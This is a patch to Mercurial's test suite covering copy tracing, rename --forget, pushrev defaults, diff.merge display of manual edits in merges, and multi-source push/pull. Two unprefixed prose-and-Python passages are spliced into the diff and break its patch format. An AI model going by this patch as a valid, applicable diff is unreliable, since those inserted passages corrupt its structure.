+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mFG,Om")' d
+ A d
+ a (filelog !)
+ h (sidedata !)
+ h (upgraded !)
+ h (upgraded-parallel !)
+
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGF,Nm")' d
+ A d
+ a (no-changeset no-compatibility !)
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mN,GFm")' d
+ A d
+ a (no-changeset no-compatibility !)
+
+
+Subcase: chaining conflicting rename resolution, with extra change during the merge
+```````````````````````````````````````````````````````````````````````````````````
+
+The "mAEm" and "mEAm" case create a rename tracking conflict on file 'f'. We
+add more change on the respective branch and merge again. These second merge
+does not involve the file 'f' and the arbitration done within "mAEm" and "mEA"
+about that file should stay unchanged.
+
+The result from mAEm is the same for the subsequent merge:
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAE-change-m")' f
+ A f
+ a (filelog !)
+ a (sidedata !)
+ a (upgraded !)
+ a (upgraded-parallel !)
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAE-change,Km")' f
+ A f
+ a (filelog !)
+ a (sidedata !)
+ a (upgraded !)
+ a (upgraded-parallel !)
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mK,AE-change-m")' f
+ A f
+ a (no-changeset no-compatibility !)
+
+
+The result from mEAm is the same for the subsequent merge:
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEA-change-m")' f
+ A f
+ a (filelog !)
+ b (sidedata !)
+ b (upgraded !)
+ b (upgraded-parallel !)
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEA-change,Jm")' f
+ A f
+ a (filelog !)
+ b (sidedata !)
+ b (upgraded !)
+ b (upgraded-parallel !)
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mJ,EA-change-m")' f
+ A f
+ a (filelog !)
+ b (sidedata !)
+ b (upgraded !)
+ b (upgraded-parallel !)
--- a/tests/test-copies-in-changeset.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-copies-in-changeset.t Tue Apr 20 11:01:06 2021 -0400
@@ -39,11 +39,13 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: yes yes no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: yes yes no (rust !)
copies-sdc: yes yes no
+ revlog-v2: yes yes no
plain-cl-delta: yes yes yes
- compression: zlib zlib zlib
+ compression: zlib zlib zlib (no-zstd !)
+ compression: zstd zstd zstd (zstd !)
compression-level: default default default
#else
$ hg debugformat -v
@@ -53,11 +55,13 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: no no no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: yes yes no (rust !)
copies-sdc: no no no
+ revlog-v2: no no no
plain-cl-delta: yes yes yes
- compression: zlib zlib zlib
+ compression: zlib zlib zlib (no-zstd !)
+ compression: zstd zstd zstd (zstd !)
compression-level: default default default
#endif
$ echo a > a
@@ -345,7 +349,10 @@
$ hg co -q 0
$ hg mv a b
$ hg ci -qm 'rename a to b'
- $ hg rebase -d 1 --config rebase.experimental.inmemory=yes
+Not only do we want this to run in-memory, it shouldn't fall back to
+on-disk merge (no conflicts), so we force it to be in-memory
+with no fallback.
+ $ hg rebase -d 1 --config rebase.experimental.inmemory=yes --config devel.rebase.force-in-memory-merge=yes
rebasing 2:* tip "rename a to b" (glob)
merging a and b to b
saved backup bundle to $TESTTMP/rebase-rename/.hg/strip-backup/*-*-rebase.hg (glob)
@@ -421,11 +428,13 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: yes yes no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: yes yes no (rust !)
copies-sdc: yes yes no
+ revlog-v2: yes yes no
plain-cl-delta: yes yes yes
- compression: zlib zlib zlib
+ compression: zlib zlib zlib (no-zstd !)
+ compression: zstd zstd zstd (zstd !)
compression-level: default default default
$ hg debugsidedata -c -- 0
1 sidedata entries
@@ -447,11 +456,13 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: yes yes no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: yes yes no (rust !)
copies-sdc: no no no
+ revlog-v2: yes yes no
plain-cl-delta: yes yes yes
- compression: zlib zlib zlib
+ compression: zlib zlib zlib (no-zstd !)
+ compression: zstd zstd zstd (zstd !)
compression-level: default default default
$ hg debugsidedata -c -- 0
1 sidedata entries
@@ -475,11 +486,13 @@
generaldelta: yes yes yes
share-safe: no no no
sparserevlog: yes yes yes
- sidedata: yes yes no
- persistent-nodemap: no no no
+ persistent-nodemap: no no no (no-rust !)
+ persistent-nodemap: yes yes no (rust !)
copies-sdc: yes yes no
+ revlog-v2: yes yes no
plain-cl-delta: yes yes yes
- compression: zlib zlib zlib
+ compression: zlib zlib zlib (no-zstd !)
+ compression: zstd zstd zstd (zstd !)
compression-level: default default default
$ hg debugsidedata -c -- 0
1 sidedata entries
--- a/tests/test-copies.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-copies.t Tue Apr 20 11:01:06 2021 -0400
@@ -93,8 +93,10 @@
x y
$ hg debugp1copies -r 1
x -> y
-Incorrectly doesn't show the rename
$ hg debugpathcopies 0 1
+ x -> y (no-filelog !)
+ $ hg debugpathcopies 0 1 --config devel.copy-tracing.trace-all-files=yes
+ x -> y
Copy a file onto another file with same content. If metadata is stored in changeset, this does not
produce a new filelog entry. The changeset's "files" entry should still list the file.
@@ -111,8 +113,10 @@
x x2
$ hg debugp1copies -r 1
x -> x2
-Incorrectly doesn't show the rename
$ hg debugpathcopies 0 1
+ x -> x2 (no-filelog !)
+ $ hg debugpathcopies 0 1 --config devel.copy-tracing.trace-all-files=yes
+ x -> x2
Rename file in a loop: x->y->z->x
$ newrepo
@@ -374,6 +378,29 @@
$ hg debugpathcopies 1 3
x -> z
+Copy x->y on two separate branches. Pathcopies from one branch to the other
+should not report the copy.
+ $ newrepo
+ $ echo x > x
+ $ hg ci -Aqm 'add x'
+ $ hg cp x y
+ $ hg ci -qm 'copy x to y'
+ $ hg co -q 0
+ $ hg graft 1 -q
+ $ hg l
+ @ 2 copy x to y
+ | y
+ | o 1 copy x to y
+ |/ y
+ o 0 add x
+ x
+ $ hg debugp1copies -r 1
+ x -> y
+ $ hg debugp1copies -r 2
+ x -> y
+ $ hg debugpathcopies 1 2
+ $ hg debugpathcopies 2 1
+
Copy x to y on one side of merge, create y and rename to z on the other side.
$ newrepo
$ echo x > x
--- a/tests/test-copy.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-copy.t Tue Apr 20 11:01:06 2021 -0400
@@ -228,6 +228,17 @@
should show no copies
$ hg st -C
+note: since filelog based copy tracing only traces copies for new files, the copy information here is not displayed.
+
+ $ hg status --copies --change .
+ M bar
+
+There is a devel option to walk all files and find this information anyway.
+
+ $ hg status --copies --change . --config devel.copy-tracing.trace-all-files=yes
+ M bar
+ foo
+
copy --after on an added file
$ cp bar baz
$ hg add baz
@@ -266,19 +277,25 @@
$ rm baz xyzzy
-Test unmarking copy of a single file
+Test unmarking copy/rename of a single file
# Set up by creating a copy
$ hg cp bar baz
-# Test uncopying a non-existent file
+# Test unmarking as copy a non-existent file
$ hg copy --forget non-existent
non-existent: $ENOENT$
-# Test uncopying an tracked but unrelated file
+ $ hg rename --forget non-existent
+ non-existent: $ENOENT$
+# Test unmarking as copy a tracked but unrelated file
$ hg copy --forget foo
foo: not unmarking as copy - file is not marked as copied
-# Test uncopying a copy source
+ $ hg rename --forget foo
+ foo: not unmarking as copy - file is not marked as copied
+# Test unmarking as copy a copy source
$ hg copy --forget bar
bar: not unmarking as copy - file is not marked as copied
+ $ hg rename --forget bar
+ bar: not unmarking as copy - file is not marked as copied
# baz should still be marked as a copy
$ hg st -C
A baz
@@ -287,17 +304,38 @@
$ hg copy --forget baz
$ hg st -C
A baz
-# Test uncopy with matching an non-matching patterns
+ $ rm bar
+ $ hg rename --after bar baz
+ $ hg st -C
+ A baz
+ bar
+ R bar
+ $ hg rename --forget baz
+ $ hg st -C
+ A baz
+ R bar
+ $ hg revert bar
+# Test unmarking as copy with matching and non-matching patterns
$ hg cp bar baz --after
$ hg copy --forget bar baz
bar: not unmarking as copy - file is not marked as copied
+ $ hg cp bar baz --after
+ $ hg rename --forget bar baz
+ bar: not unmarking as copy - file is not marked as copied
$ hg st -C
A baz
-# Test uncopy with no exact matches
+# Test unmarking as copy with no exact matches
$ hg cp bar baz --after
$ hg copy --forget .
$ hg st -C
A baz
+ $ hg cp bar baz --after
+ $ hg st -C
+ A baz
+ bar
+ $ hg rename --forget .
+ $ hg st -C
+ A baz
$ hg forget baz
$ rm baz
--- a/tests/test-debugcommands.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-debugcommands.t Tue Apr 20 11:01:06 2021 -0400
@@ -186,8 +186,10 @@
node trie capacity: 4
node trie count: 2
node trie depth: 1
- node trie last rev scanned: -1
- node trie lookups: 4
+ node trie last rev scanned: -1 (no-rust !)
+ node trie last rev scanned: 3 (rust !)
+ node trie lookups: 4 (no-rust !)
+ node trie lookups: 2 (rust !)
node trie misses: 1
node trie splits: 1
revs in memory: 3
@@ -368,7 +370,8 @@
7 1
8 1
9 1
- 10 2
+ 10 2 (no-zstd !)
+ 10 1 (zstd !)
11 1
$ hg --config extensions.strip= strip --no-backup -r 1
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
@@ -636,7 +639,6 @@
remote-changegroup
http
https
- rev-branch-cache
stream
v2
@@ -654,8 +656,10 @@
devel-peer-request: pairs: 81 bytes
sending hello command
sending between command
- remote: 463
- remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ remote: 444 (no-rust !)
+ remote: 463 (rust !)
+ remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (no-rust !)
+ remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,persistent-nodemap,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (rust !)
remote: 1
devel-peer-request: protocaps
devel-peer-request: caps: * bytes (glob)
--- a/tests/test-default-push.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-default-push.t Tue Apr 20 11:01:06 2021 -0400
@@ -137,6 +137,7 @@
$ hg --config 'paths.default:pushrev=notdefined()' push
pushing to file:/*/$TESTTMP/pushurlsource/../pushurldest (glob)
hg: parse error: unknown identifier: notdefined
+ (did you mean nodefromfile?)
[10]
$ hg --config 'paths.default:pushrev=(' push
@@ -146,4 +147,40 @@
^ here)
[10]
+default :pushrev is taken into account
+
+ $ echo babar > foo
+ $ hg ci -m 'extra commit'
+ $ hg up '.^'
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ $ echo celeste > foo
+ $ hg ci -m 'extra other commit'
+ created new head
+ $ cat >> .hg/hgrc << EOF
+ > [paths]
+ > other = file://$WD/../pushurldest
+ > *:pushrev = .
+ > EOF
+ $ hg push other
+ pushing to file:/*/$TESTTMP/pushurlsource/../pushurldest (glob)
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 1 changesets with 1 changes to 1 files
+ $ hg push file://$WD/../pushurldest
+ pushing to file:/*/$TESTTMP/pushurlsource/../pushurldest (glob)
+ searching for changes
+ no changes found
+ [1]
+
+for comparison, pushing everything would give a different result
+
+ $ hg push file://$WD/../pushurldest --rev 'all()'
+ pushing to file:/*/$TESTTMP/pushurlsource/../pushurldest (glob)
+ searching for changes
+ abort: push creates new remote head 1616ce7cecc8
+ (merge or see 'hg help push' for details about pushing new heads)
+ [20]
+
$ cd ..
--- a/tests/test-diff-change.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-diff-change.t Tue Apr 20 11:01:06 2021 -0400
@@ -194,4 +194,105 @@
9
10
+merge diff should show only manual edits to a merge:
+
+ $ hg diff --config diff.merge=yes -c 6
+(no diff output is expected here)
+
+Construct an "evil merge" that does something other than just the merge.
+
+ $ hg co ".^"
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ $ hg merge -r 5
+ merging file.txt
+ 0 files updated, 1 files merged, 0 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ echo 11 >> file.txt
+ $ hg ci -m 'merge 8 to y with manual edit of 11' # 7
+ created new head
+ $ hg diff -c 7
+ diff -r 273b50f17c6d -r 8ad85e839ba7 file.txt
+ --- a/file.txt Thu Jan 01 00:00:00 1970 +0000
+ +++ b/file.txt Thu Jan 01 00:00:00 1970 +0000
+ @@ -6,6 +6,7 @@
+ 5
+ 6
+ 7
+ -8
+ +y
+ 9
+ 10
+ +11
+Contrast with the `hg diff -c 7` version above: only the manual edit shows
+up, making it easy to identify changes someone is otherwise trying to sneak
+into a merge.
+ $ hg diff --config diff.merge=yes -c 7
+ diff -r 8ad85e839ba7 file.txt
+ --- a/file.txt Thu Jan 01 00:00:00 1970 +0000
+ +++ b/file.txt Thu Jan 01 00:00:00 1970 +0000
+ @@ -9,3 +9,4 @@
+ y
+ 9
+ 10
+ +11
+
+Set up a conflict.
+ $ hg co ".^"
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ $ sed -e 's,^8$,z,' file.txt > file.txt.tmp
+ $ mv file.txt.tmp file.txt
+ $ hg ci -m 'conflicting edit: 8 to z'
+ created new head
+ $ echo "this file is new in p1 of the merge" > new-file-p1.txt
+ $ hg ci -Am 'new file' new-file-p1.txt
+ $ hg log -r . --template 'p1 will be rev {rev}\n'
+ p1 will be rev 9
+ $ hg co 5
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ $ echo "this file is new in p2 of the merge" > new-file-p2.txt
+ $ hg ci -Am 'new file' new-file-p2.txt
+ created new head
+ $ hg log -r . --template 'p2 will be rev {rev}\n'
+ p2 will be rev 10
+ $ hg co -- 9
+ 2 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ $ hg merge -r 10
+ merging file.txt
+ warning: conflicts while merging file.txt! (edit, then use 'hg resolve --mark')
+ 1 files updated, 0 files merged, 0 files removed, 1 files unresolved
+ use 'hg resolve' to retry unresolved file merges or 'hg merge --abort' to abandon
+ [1]
+ $ hg revert file.txt -r .
+ $ hg resolve -ma
+ (no more unresolved files)
+ $ hg commit -m 'merge conflicted edit'
+Without diff.merge, it's a diff against p1
+ $ hg diff --config diff.merge=no -c 11
+ diff -r fd1f17c90d7c -r 5010caab09f6 new-file-p2.txt
+ --- /dev/null Thu Jan 01 00:00:00 1970 +0000
+ +++ b/new-file-p2.txt Thu Jan 01 00:00:00 1970 +0000
+ @@ -0,0 +1,1 @@
+ +this file is new in p2 of the merge
+With diff.merge, it's a diff against the conflicted content.
+ $ hg diff --config diff.merge=yes -c 11
+ diff -r 5010caab09f6 file.txt
+ --- a/file.txt Thu Jan 01 00:00:00 1970 +0000
+ +++ b/file.txt Thu Jan 01 00:00:00 1970 +0000
+ @@ -6,12 +6,6 @@
+ 5
+ 6
+ 7
+ -<<<<<<< local: fd1f17c90d7c - test: new file
+ z
+ -||||||| base
+ -8
+ -=======
+ -y
+ ->>>>>>> other: d9e7de69eac3 - test: new file
+ 9
+ 10
+
+There must _NOT_ be a .hg/merge directory left over.
+ $ test ! -d .hg/merge
+(No output is expected)
$ cd ..
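
Conceptually, `diff.merge=yes` diffs the committed merge against the
mechanically merged (pre-edit) content instead of against p1, so everything
the merge machinery produced cancels out and only the manual edits surface.
A minimal Python sketch of that idea, assuming `premerge_lines` holds the
auto-merged content; this is a conceptual model, not Mercurial's
implementation:

  import difflib

  def merge_diff(premerge_lines, committed_lines, path="file.txt"):
      # diff the final commit against the pre-edit merge result rather
      # than against p1: a clean merge yields an empty diff, and an
      # "evil merge" shows exactly the sneaked-in edits
      return "".join(
          difflib.unified_diff(
              premerge_lines,
              committed_lines,
              fromfile="a/" + path,
              tofile="b/" + path,
          )
      )
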
--- a/tests/test-dispatch.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-dispatch.t Tue Apr 20 11:01:06 2021 -0400
@@ -154,7 +154,7 @@
$ HGPLAIN=+strictflags hg --config='hooks.pre-log=false' log -b default
abort: pre-log hook exited with status 1
- [255]
+ [40]
$ HGPLAIN=+strictflags hg --cwd .. -q -Ra log -b default
0:cb9a9f314b8b
$ HGPLAIN=+strictflags hg --cwd .. -q --repository a log -b default
@@ -166,7 +166,7 @@
$ HGPLAIN= hg log --config='hooks.pre-log=false' -b default
abort: pre-log hook exited with status 1
- [255]
+ [40]
$ HGPLAINEXCEPT= hg log --cwd .. -q -Ra -b default
0:cb9a9f314b8b
--- a/tests/test-doctest.py Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-doctest.py Tue Apr 20 11:01:06 2021 -0400
@@ -158,6 +158,7 @@
('mercurial.util', '{}'),
('mercurial.utils.dateutil', '{}'),
('mercurial.utils.stringutil', '{}'),
+ ('mercurial.utils.urlutil', '{}'),
('tests.drawdag', '{}'),
('tests.test-run-tests', '{}'),
('tests.test-url', "{'optionflags': 4}"),
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/tests/test-exchange-multi-source.t Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,613 @@
+=====================================================
+Test push/pull from multiple sources at the same time
+=====================================================
+
+
+Setup
+=====
+
+main repository
+---------------
+
+ $ . $RUNTESTDIR/testlib/common.sh
+ $ hg init main-repo
+ $ cd main-repo
+ $ mkcommit A
+ $ mkcommit B
+ $ mkcommit C
+ $ mkcommit D
+ $ mkcommit E
+ $ hg up 'desc(B)'
+ 0 files updated, 0 files merged, 3 files removed, 0 files unresolved
+ $ mkcommit F
+ created new head
+ $ mkcommit G
+ $ hg up 'desc(C)'
+ 1 files updated, 0 files merged, 2 files removed, 0 files unresolved
+ $ mkcommit H
+ created new head
+ $ hg up null --quiet
+ $ hg log -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G
+ o H 7
+ |
+ | o E 4
+ | |
+ | o D 3
+ |/
+ o C 2
+ |
+ | o G 6
+ | |
+ | o F 5
+ |/
+ o B 1
+ |
+ o A 0
+
+ $ cd ..
+
+Various other repositories
+--------------------------
+
+ $ hg clone main-repo branch-E --rev 4 -U
+ adding changesets
+ adding manifests
+ adding file changes
+ added 5 changesets with 5 changes to 5 files
+ new changesets 4a2df7238c3b:a603bfb5a83e
+ $ hg clone main-repo branch-G --rev 6 -U
+ adding changesets
+ adding manifests
+ adding file changes
+ added 4 changesets with 4 changes to 4 files
+ new changesets 4a2df7238c3b:c521a06b234b
+ $ hg clone main-repo branch-H --rev 7 -U
+ adding changesets
+ adding manifests
+ adding file changes
+ added 4 changesets with 4 changes to 4 files
+ new changesets 4a2df7238c3b:40faebb2ec45
+
+Test simple bare operation
+==========================
+
+pull
+----
+
+ $ hg clone main-repo test-repo-bare --rev 0 -U
+ adding changesets
+ adding manifests
+ adding file changes
+ added 1 changesets with 1 changes to 1 files
+ new changesets 4a2df7238c3b
+
+ $ hg pull -R test-repo-bare ./branch-E ./branch-G ./branch-H
+ pulling from ./branch-E
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 4 changesets with 4 changes to 4 files
+ new changesets 27547f69f254:a603bfb5a83e
+ (run 'hg update' to get a working copy)
+ pulling from ./branch-G
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 2 changesets with 2 changes to 2 files (+1 heads)
+ new changesets 2f3a4c5c1417:c521a06b234b
+ (run 'hg heads' to see heads, 'hg merge' to merge)
+ pulling from ./branch-H
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 1 changesets with 1 changes to 1 files (+1 heads)
+ new changesets 40faebb2ec45
+ (run 'hg heads .' to see heads, 'hg merge' to merge)
+ $ hg log -R test-repo-bare -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G
+ o H 7
+ |
+ | o E 4
+ | |
+ | o D 3
+ |/
+ o C 2
+ |
+ | o G 6
+ | |
+ | o F 5
+ |/
+ o B 1
+ |
+ o A 0
+
+
+push
+----
+
+ $ cp -R ./branch-E ./branch-E-push
+ $ cp -R ./branch-G ./branch-G-push
+ $ cp -R ./branch-H ./branch-H-push
+ $ hg out -G -R test-repo-bare ./branch-E-push ./branch-G-push ./branch-H-push
+ comparing with ./branch-E-push
+ searching for changes
+ comparing with ./branch-G-push
+ searching for changes
+ comparing with ./branch-H-push
+ searching for changes
+ o changeset: 7:40faebb2ec45
+ | tag: tip
+ | parent: 2:f838bfaca5c7
+ | user: test
+ | date: Thu Jan 01 00:00:00 1970 +0000
+ | summary: H
+ |
+ | o changeset: 6:c521a06b234b
+ | | user: test
+ | | date: Thu Jan 01 00:00:00 1970 +0000
+ | | summary: G
+ | |
+ | o changeset: 5:2f3a4c5c1417
+ | parent: 1:27547f69f254
+ | user: test
+ | date: Thu Jan 01 00:00:00 1970 +0000
+ | summary: F
+ |
+ | o changeset: 4:a603bfb5a83e
+ | | user: test
+ | | date: Thu Jan 01 00:00:00 1970 +0000
+ | | summary: E
+ | |
+ | o changeset: 3:b3325c91a4d9
+ |/ user: test
+ | date: Thu Jan 01 00:00:00 1970 +0000
+ | summary: D
+ |
+ o changeset: 2:f838bfaca5c7
+ user: test
+ date: Thu Jan 01 00:00:00 1970 +0000
+ summary: C
+
+ $ hg bundle -R test-repo-bare bundle.hg ./branch-E-push ./branch-G-push ./branch-H-push
+ searching for changes
+ searching for changes
+ searching for changes
+ 6 changesets found
+ $ hg push --force -R test-repo-bare ./branch-E-push ./branch-G-push ./branch-H-push
+ pushing to ./branch-E-push
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 3 changesets with 3 changes to 3 files (+2 heads)
+ pushing to ./branch-G-push
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 4 changesets with 4 changes to 4 files (+2 heads)
+ pushing to ./branch-H-push
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 4 changesets with 4 changes to 4 files (+2 heads)
+ $ hg log -R ./branch-E-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G
+ o H 7
+ |
+ | o E 4
+ | |
+ | o D 3
+ |/
+ o C 2
+ |
+ | o G 6
+ | |
+ | o F 5
+ |/
+ o B 1
+ |
+ o A 0
+
+ $ hg log -R ./branch-G-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G
+ o H 7
+ |
+ | o E 6
+ | |
+ | o D 5
+ |/
+ o C 4
+ |
+ | o G 3
+ | |
+ | o F 2
+ |/
+ o B 1
+ |
+ o A 0
+
+ $ hg log -R ./branch-H-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G
+ o G 7
+ |
+ o F 6
+ |
+ | o E 5
+ | |
+ | o D 4
+ | |
+ | | o H 3
+ | |/
+ | o C 2
+ |/
+ o B 1
+ |
+ o A 0
+
+ $ rm -rf ./*-push
+
+Test operation with a target
+============================
+
+pull
+----
+
+ $ hg clone main-repo test-repo-rev --rev 0 -U
+ adding changesets
+ adding manifests
+ adding file changes
+ added 1 changesets with 1 changes to 1 files
+ new changesets 4a2df7238c3b
+
+pulling an explicit revision
+
+ $ node_b=`hg log -R main-repo --rev 'desc(B)' -T '{node}'`
+ $ hg pull -R test-repo-rev ./branch-E ./branch-G ./branch-H --rev $node_b
+ pulling from ./branch-E
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 1 changesets with 1 changes to 1 files
+ new changesets 27547f69f254
+ (run 'hg update' to get a working copy)
+ pulling from ./branch-G
+ no changes found
+ pulling from ./branch-H
+ no changes found
+ $ hg log -R test-repo-rev -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G
+ o B 1
+ |
+ o A 0
+
+
+pulling a branch head; the branch head resolves to a different revision on the
+different repositories.
+
+ $ hg pull -R test-repo-rev ./branch-E ./branch-G ./branch-H --rev default
+ pulling from ./branch-E
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 3 changesets with 3 changes to 3 files
+ new changesets f838bfaca5c7:a603bfb5a83e
+ (run 'hg update' to get a working copy)
+ pulling from ./branch-G
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 2 changesets with 2 changes to 2 files (+1 heads)
+ new changesets 2f3a4c5c1417:c521a06b234b
+ (run 'hg heads' to see heads, 'hg merge' to merge)
+ pulling from ./branch-H
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 1 changesets with 1 changes to 1 files (+1 heads)
+ new changesets 40faebb2ec45
+ (run 'hg heads .' to see heads, 'hg merge' to merge)
+ $ hg log -R test-repo-rev -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G
+ o H 7
+ |
+ | o E 4
+ | |
+ | o D 3
+ |/
+ o C 2
+ |
+ | o G 6
+ | |
+ | o F 5
+ |/
+ o B 1
+ |
+ o A 0
+
+
+push
+----
+
+We only push a specific branch with --rev
+
+ $ cp -R ./branch-E ./branch-E-push
+ $ cp -R ./branch-G ./branch-G-push
+ $ cp -R ./branch-H ./branch-H-push
+ $ hg out -G -R test-repo-bare ./branch-E-push ./branch-G-push ./branch-H-push --rev default
+ comparing with ./branch-E-push
+ searching for changes
+ comparing with ./branch-G-push
+ searching for changes
+ comparing with ./branch-H-push
+ searching for changes
+ no changes found
+ o changeset: 7:40faebb2ec45
+ | tag: tip
+ | parent: 2:f838bfaca5c7
+ | user: test
+ | date: Thu Jan 01 00:00:00 1970 +0000
+ | summary: H
+ |
+ o changeset: 2:f838bfaca5c7
+ user: test
+ date: Thu Jan 01 00:00:00 1970 +0000
+ summary: C
+
+ $ hg bundle -R test-repo-bare bundle.hg ./branch-E-push ./branch-G-push ./branch-H-push --rev default
+ searching for changes
+ searching for changes
+ searching for changes
+ 2 changesets found
+ $ hg push --force -R test-repo-bare ./branch-E-push ./branch-G-push ./branch-H-push --rev default
+ pushing to ./branch-E-push
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 1 changesets with 1 changes to 1 files (+1 heads)
+ pushing to ./branch-G-push
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 2 changesets with 2 changes to 2 files (+1 heads)
+ pushing to ./branch-H-push
+ searching for changes
+ no changes found
+ $ hg log -R ./branch-E-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G
+ o H 5
+ |
+ | o E 4
+ | |
+ | o D 3
+ |/
+ o C 2
+ |
+ o B 1
+ |
+ o A 0
+
+ $ hg log -R ./branch-G-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G
+ o H 5
+ |
+ o C 4
+ |
+ | o G 3
+ | |
+ | o F 2
+ |/
+ o B 1
+ |
+ o A 0
+
+ $ hg log -R ./branch-H-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G
+ o H 3
+ |
+ o C 2
+ |
+ o B 1
+ |
+ o A 0
+
+ $ rm -rf ./*-push
+
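The narrowing at work here can be sketched with plain sets: the revisions
selected by --rev are reduced to whatever each destination is missing, so one
command sends different changesets to different targets and is a no-op for a
target that already has everything. Toy model, not Mercurial code:

  # Ancestors of --rev default in test-repo-bare (head H, parent C).
  selected = {"A", "B", "C", "H"}
  destination_has = {
      "./branch-E-push": {"A", "B", "C", "D", "E"},
      "./branch-G-push": {"A", "B", "F", "G"},
      "./branch-H-push": {"A", "B", "C", "H"},
  }

  for dest, known in destination_has.items():
      outgoing = selected - known
      print(dest, "->", sorted(outgoing) or "no changes found")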
+Same push, but the no-op is no longer the last one
+
+ $ cp -R ./branch-E ./branch-E-push
+ $ cp -R ./branch-G ./branch-G-push
+ $ cp -R ./branch-H ./branch-H-push
+ $ hg out -G -R test-repo-bare ./branch-G-push ./branch-H-push ./branch-E-push --rev default
+ comparing with ./branch-G-push
+ searching for changes
+ comparing with ./branch-H-push
+ searching for changes
+ no changes found
+ comparing with ./branch-E-push
+ searching for changes
+ o changeset: 7:40faebb2ec45
+ | tag: tip
+ | parent: 2:f838bfaca5c7
+ | user: test
+ | date: Thu Jan 01 00:00:00 1970 +0000
+ | summary: H
+ |
+ o changeset: 2:f838bfaca5c7
+ user: test
+ date: Thu Jan 01 00:00:00 1970 +0000
+ summary: C
+
+ $ hg bundle -R test-repo-bare bundle.hg ./branch-G-push ./branch-H-push ./branch-E-push --rev default
+ searching for changes
+ searching for changes
+ searching for changes
+ 2 changesets found
+ $ hg push --force -R test-repo-bare ./branch-G-push ./branch-H-push ./branch-E-push --rev default
+ pushing to ./branch-G-push
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 2 changesets with 2 changes to 2 files (+1 heads)
+ pushing to ./branch-H-push
+ searching for changes
+ no changes found
+ pushing to ./branch-E-push
+ searching for changes
+ adding changesets
+ adding manifests
+ adding file changes
+ added 1 changesets with 1 changes to 1 files (+1 heads)
+ $ hg log -R ./branch-E-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G
+ o H 5
+ |
+ | o E 4
+ | |
+ | o D 3
+ |/
+ o C 2
+ |
+ o B 1
+ |
+ o A 0
+
+ $ hg log -R ./branch-G-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G
+ o H 5
+ |
+ o C 4
+ |
+ | o G 3
